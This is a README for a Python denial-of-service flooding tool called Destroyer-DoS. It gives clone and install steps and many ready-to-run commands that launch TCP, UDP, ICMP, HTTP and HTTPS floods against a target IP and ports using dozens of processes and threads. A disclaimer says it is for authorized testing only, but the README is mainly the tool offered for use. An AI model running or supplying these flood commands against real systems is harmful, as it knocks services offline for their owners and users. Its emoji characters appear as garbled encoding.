Destroyer-DoS is an educational script for simulating Distributed Denial of Service (DDoS) attacks. This tool uses Pythonβs async and multiprocessing capabilities to unleash high-impact network stress on specified IPs and ports. Ideal for testing network resilience in authorized environments. π
- π― Multi-Protocol Support: TCP, UDP, HTTP, HTTPS, ICMP
- π Asynchronous Packet Sending: Fast and non-blocking
- π Multiprocessing: High-throughput operations
- 𧩠Flexible Packet Size, Process & Thread Control
- π» Cross-Platform Compatible with Robust Error Handling
-
Clone the Repository:
git clone https://github.com/Destroyer-official/Destroyer-DoS.git
-
Navigate to the Directory:
cd Destroyer-DoS
-
Install Required Packages:
- Standard library dependencies are generally included with Python. If you're using Python <3.4, install any missing modules listed in
requirements.txt
:
pip install -r requirements.txt
- Standard library dependencies are generally included with Python. If you're using Python <3.4, install any missing modules listed in
To execute the script, run:
python ddos.py -ip [Target_IP] -p [Target_Port] -pr [Processes] -t [Threads] -[Protocol]
Examples:
- TCP Attack:
python ddos.py -ip 192.168.0.1 -p 80 -pr 30 -t 20 -T
- UDP Attack:
python ddos.py -ip 192.168.0.1 -p 53 -pr 30 -t 20 -U
- ICMP Ping Attack:
python ddos.py -ip 192.168.0.1 -pr 30 -t 20 -I
- HTTP Flood:
python ddos.py -ip 192.168.0.1 -p 80 -pr 30 -t 20 -H
- HTTPS Flood:
python ddos.py -ip 192.168.0.1 -p 443 -pr 30 -t 20 -S
- Run all protocols simultaneously:
python ddos.py -ip 192.168.0.1 -p 80 -pr 30 -t 20 -A
- Custom Port Range:
python ddos.py -ip 192.168.0.1 -p 80-90 -pr 30 -t 20 -T
- Multiple Ports:
python ddos.py -ip 192.168.0.1 -p 80,443,8080 -pr 30 -t 20 -U
- Specify Packet Size:
python ddos.py -ip 192.168.0.1 -p 80 -pr 30 -t 20 -ps 1024 -T
Argument | Description |
---|---|
-ip |
Target IP address. |
-p |
Target port (can be a single port, range, or multiple ports separated by commas). |
-T |
Use TCP protocol for the test. |
-U |
Use UDP protocol for the test. |
-I |
Use ICMP protocol (ping simulation). |
-H |
Use HTTP protocol. |
-S |
Use HTTPS protocol. |
-A |
Run all protocols concurrently. |
-pr |
Number of processes to run concurrently (default: 30). |
-t |
Number of threads per process (default: 40). |
-ps |
Packet size in bytes (default: maximum for selected protocol). |
-
Target Preparation:
- Validates target IP and port information.
- Establishes CPU affinity to optimize resource usage on multi-core systems.
-
Protocol-Specific Packet Sending:
- TCP: Creates TCP connections and sends continuous random data streams.
- UDP: Sends random UDP packets to impact network bandwidth.
- ICMP: Simulates ping requests using ICMP packets.
- HTTP/HTTPS: Sends asynchronous HTTP/HTTPS requests to simulate web server load.
-
Process and Thread Management:
- Distributes load across multiple processes and threads, simulating distributed attacks.
Disclaimer: This script is intended for educational purposes only and should be used to test network robustness in authorized environments. Unauthorized use may have legal consequences. Always ensure proper authorization.
Contributions are welcome! If you have ideas for improvements, feel free to submit a pull request or create an issue.
This project is licensed under the MIT License. See the LICENSE file for more details.
Happy Testing! ππ